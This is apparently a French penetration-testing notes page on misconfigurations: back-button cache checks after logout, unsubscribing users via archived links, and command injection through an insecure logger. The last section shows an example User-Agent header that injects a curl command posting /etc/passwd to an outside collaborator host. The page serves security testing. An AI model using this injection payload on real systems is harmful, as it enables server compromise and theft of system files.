🚧Misconfigurations

Cache control misconfiguration

  • Se connecter

  • naviguer normalement dans la page

  • Se déconnecter

  • Faire un alt+flèche gauche pour revenir en arrière

  • Si connecté au même endroit il y a une misconfig

Tentative de désinscription d'utilisateur

Tenter de désinscrire quelqu'un avec le code de désinscription en le passant dans la wayback machine.

Injection de commande via logger non sécurisé

Si un logger no sécurisé est utilisé, il est possible d'injecter et de faire exécuter du code au serveur cible même sur une page 404 via l'en-tête "User-Agent:" par exemple qui loggera et exécutera la commande voulu.

Il s'agit un peut du même principe que lorsqu'on essai d'obtenir une RCE via une LFI et qu'on cherche à exécuter son script via les logs.

Exemple:

#Requête

GET /thispagedoesnotexist HTTP 1.1
Host: ...
User-Ageny: Mozilla/... Firefox/..."; curl -X POST -d @/etc/passwd http://my.burp.collab.com/ #
...
...

Reponse:

HTTP/1.1 404 Not Found
...
...

Reponse dans burp collab:

POST / HTTP/1.1
...
...

root:x:... [/etc/passwd]
PrécédentOne linersSuivantAnalyse statique

Dernière mise à jour